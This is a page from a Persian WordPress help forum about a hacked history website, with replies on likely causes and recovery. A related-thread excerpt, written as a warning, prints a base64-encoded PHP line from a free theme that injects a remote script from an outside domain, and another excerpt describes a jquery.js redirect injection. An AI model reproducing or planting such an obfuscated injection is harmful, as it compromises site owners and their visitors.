• اطلاعیه ها

    • Saeed Fard

      برگزاری میتاپ وردپرسی   14/08/96

      بعد از اولین دوره همایش وردپرس در ایران اگر پیگیر اخبار وردپرس بوده باشید، حتما خبر برگزاری چندین میتاپ و جلسه متعدد وردپرسی را شنیده‌اید، یکی از بحث‌های اصلی که محور اصلی این میتاپ‌ها بوده است برگزاری وردکمپ بود که به طور جدی دنبال می‌شود. این میتاپ‌ها و جلسات توسط جمعی از فعلان حوزه وردپرس در کنار وردپرس‌پارسی برگزار می‌شد و مسائل مربوط به این حیطه و از جمله وردکمپ مورد بحث قرار می‌گرفت. این بار با رایزنی‌هایی که با تیم اصلی وردپرس داشتیم در بخش دوم این رویدادها قصد داریم که میتاپ‌ها و جلسات وردپرسی را به صورت آزاد برگزار کنیم تا تمامی علاقه‌مندان و دوست‌داران وردپرس فرصت حضور داشته باشند و با گردهمایی، جامعه کاملتری از دوست داران وردپرس بسازیم و از تجربیات یکدیگر استفاده کنیم.   بدیهی است که این رویدادها با رویکرد مثبت در جهت سود رسانی به جامعه وردپرس و افراد حاضر در آن برگزار می‌شود و برای تمامی علاقه‌مندان به وردپرس است. پس اگر یک کاربر معمولی وردپرس یا یک توسعه دهنده هستید می‌توانید در این رویدادها شرکت کنید. ما در ملاقات‌هایمان از موارد مختلف و کاربردی وردپرس صحبت می‌کنیم و علاقمند به توسعه هر چه بیشتر وردپرس در ایران هستیم. ما وردپرس را دوست داریم. عضویت در این گروه برای همه افرادی که مایل به پیوستن هستند بدون در نظرگرفتن توانایی‌ها، مهارت‌ها، وضعیت مالی و یا معیارهای دیگر باز و رایگان است. فضای میتاپ‌ها و جلسات ما دوستانه و آزادنه و دور از هرگونه تبعیض و رفتارهای زننده است. بر این اساس از تمامی دوستانی که علاقه‌مند به شرکت در میتاپ‌های وردپرس هستند دعوت می‌شود تا از طریق لینک زیر در سایت میتاپ اقدام به ثبت‌نام کنند و منتظر خبرهای برگزاری جلسات در آینده باشند . لینک ثبت نام و عضویت : https://www.meetup.com/Iran-WordPress-Meetup    
اتحاد ملی

توسط عربها هک شدیم اساتید لطفا کمک

4 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام

دوستان خسته نباشید

گروهی که به ظاهر عربی می باشند سایت ما را هک کردند

اصلا از چگونگی و چرایی این اقدام اطلاعی نداریم ما یک سایت تاریخی بودیم که به نقل تاریخ و ادبیات و حتی نه تفسیر تاریخ می پرداختیم.

متاسفانه در به روز رسانی وردپرس به نسخه 3.5 وردپرس تعلل کردیم ولی بعید می دانیم از طریق وردپرس ما را هک کرده باشند

چرا که نمی توانیم وارد سی پنل هاست شویم و حتی نمی توانیم رمز عبور آن را تغییر دهیم

با پشتیبانی هاست تماس گرفتیم ولی هنوز پاسخی دریافت نکردیم

از شما استاید خواهش می کنیم ما را درباره دو موشوع کمک بفرمایید

نخست چگونگی انجام این هک

و دوم چه کاری برای بازگرداندن سایت انجام دهیم

پیشا پیش از توضیحات و راهنمایی های شما عزیزان تشکر می کنیم

تشکر

پ.ن

فعلا مشکل برطرف شده بیش از این شما عزیزان را به زحمت نمی اندازیم

ویرایش شده در توسط اتحاد ملی
1

به اشتراک گذاری این پست


لینک به پست

سلام دوست عزیز.

من که از اساتید نیستم.

آدرس خودتون رو بزارید، یه گروهی هست که کارشون فقط رو CMS های رایگان هست و یکی از دوستای من رو هم مورد عنایت قرار داده بودن.

هوم پیج هک شده هم یک موزیک عربی پخش میکنه

بیشترین ضعف بک سایت میتونه از سرور ارائه دهنده خدمات هاستینگ سایت باشه.

استفاده از کد ها و افزونه هایی که در سایت شما راه نفوذ برای خودشون باز کرده باشن.

در مرحله بعد هم حتی به ضعیف بودن و ساده بودن یوزر و پس ادمین هم میرسه.

5

به اشتراک گذاری این پست


لینک به پست

بهترین راه برگردانی پشتیبان سایت هست.

و همونطور که قبلا هم بحث شده اولین مورد از سرور هست که باید امن باشه.

و در نهایت خوشحالیم که مشکل شما هم حلش ده.

4

به اشتراک گذاری این پست


لینک به پست

معمولاً این جور هکر ها یه لینکی میذارن که می تونید برید ببینید

در اون لینک ها معمولاً می بینید که یه آی پی مثل 255.255.255.255 که آی پی سرورتون هست رو هک کردند - یعنی اینکه اونا اصولاً با شما و سایت شما کاری ندارند، بلکه سرور رو مورد عنایت قرار دادند و در نتیجه سایت های موجود در اون رو هک می کنند و این جور حمله ها بخاطر ضعف امنیتی سرور هاست و نه سایت ها

2

به اشتراک گذاری این پست


لینک به پست
مهمان
این موضوع برای عدم ارسال قفل گردیده است.

  • مطالب مشابه

    • توسط mohandes1900
      سلام خسته نباشید به همه ی فعالان انجمن
      آیا کسی هست که بدونه چرا بازدید برخی از آی پی ها از سایت خیلی زیاده؟ و این که آیا ممکنه اسپم و یا ربات باشن و از کجا باید این رو بفهیمد؟
      آیا ممکنه ربات موتورهای جستجو باشه و از کجا باید این رو بفهمیم؟
    • توسط admintory
      سلام
      صورت مسئله:
      روی یک هاست چندین سایت دارم. امروز برای یکیشون متوجه اعمال خرابکاری شدم.
      آدرس سایت مورد نظر: http://golbahardaneh.com
      این سایت بعد لود فایل های js ریدایرکت میشه روی یک آی پی نامربوط. آدرس هدف: http://134.249.116.78/jquery.js
      هیچ بک آپی از قبل ندارم.
      کاری که من کردم:
      1- از فایل ها و دیتابیس فعلی بک آپ گرفتم.
      2- افزونه امنیتی WordFence رو نصب کردم و سایت رو اسکن کردم. نتیجه اسکن تایید آلوده بودن حدود 400 فایل js به کد مخرب بود.
      3- از طریق این لینک   https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection  کد مخرب رو پیدا کردم و جاش یه کد جایگزین رو در همه فایلها گذاشتم.
      4- توی htaccess آدرس هدف رو بن کردم.
      5- توی یه سایت اسکنر امنیتی معروف سایت رو اسکن کردم (SUCURI SITE) که چند تا هشدار Maleware به من داد. ولی چیزی نفهمیدم ازش
      6- وردپرس و پلاگین ها رو آپدیت کردم.
       
      ولی هنوز مشکل حل نشده. لطفا کمک کنید.
      نکته: ریدایرکت فقط برای صفحه اصلی سایته و صفحات داخلی با وارد کردن مستقیم آدرس صفحه لود میشن. مثل http://golbahardaneh.com/business-model
    • توسط محمدرضا فتحی
      چند روزی هست که وقتی گزارش گوگل آنالیتیک رو نگاه میکنم و میخوام چک کنم ببینم کدوم یکی از پیج های وبسایتم بیشتر بازدید شده با یک url مربوط به وبسایت reddit.com مواجه میشم. امکانش هست این وبسایت، سایت من رو هک کرده باشه و وقتی کاربرای اینترنت توی سایت من هستن ریدایرکتشون کنه توی سایت خودش؟
      اگر حدسم درسته لطفا راهنمایی کنید چطور باید جلوش رو بگیرم و اگر اشتباهه پس چرا گوگل آنالیتیک این url رو جزء پیج های نمایش داده شده وبسایت من بهم نشون میده؟
      این آدرس کاملی هست که گوگل آنالیتیک بهم نشون میده:
      www.reddit.com/r/technology/comments/5foynf/lifehac%C4%B8ercom_original_idn_fake_safe_best_on_ff/
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط m2ostafa
      سلام من  سایتم ۲ بار  هک شده بود بخاطر همین یسری فایل های مخرب توش دیده بودم و سعی کردم پاک کنم.یبار کامل سایت رفت پایین و مجبور به ریکاوری شدیم.الان سایت بالاست اما خیلی هنوز فایل های مخرب توش تکثیر میشه اونقدر که دیگه الان هاست ۱ گیگم پر شده در صورتی که ۳۰۰ مگ دیتا بیشتر ندارم.کسی می تونه کمکم کنه بگه چجوری فایل هارو پیدا کنم؟